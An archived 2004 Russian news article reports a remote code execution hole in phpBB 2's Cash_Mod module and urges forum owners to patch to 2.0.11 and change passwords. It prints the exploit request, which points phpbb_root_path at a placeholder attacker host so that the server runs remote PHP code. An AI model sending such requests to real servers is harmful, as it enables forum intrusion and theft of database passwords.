Дыра в phpBB 2 открыла доступ к форумам

Вебпланета

≡ Архив | архивная статья | 19.11.2004 18:34

В модуле Cash_Mod популярного форумного движка phpBB 2 несколько дней назад была обнаружена опасная уязвимость.

С помощью опубликованного в интернете эксплоита удаленный атакующий имеет возможность выполнить на уязвимой системе собственный PHP-код таким образом:

http://хост.жертвы/phpBB2/
admin/admin_cash.php?
setmodules=1&phpbb_root_path
=http://хост.атакующего/

Проблема в том, что на движке phpBB работает большое количество форумов в Рунете, и для их владельцев сегодняшний день стал настоящим кошмаром. Анализ логов показал, что банды российских хакеров с сегодняшнего дня уже вовсю начали использовать опубликованный эксплоит, который позволяет проникнуть в систему, получить пароли к базе данных, и скрыться незаметно для владельца форума.

Судя по всему, многие владельцы форумов на phpBB 2 до сих не осознали существующей опасности. Им нужно срочно закрыть доступ к форумам и оперативно устранить уязвимость — вчера была опубликована пропатченная версия phpBB 2.0.11. После этого можно посмотреть в логах, что успели утащить хакеры и при необходимости поменять пароли.

комментарии(2)

разделы: Архив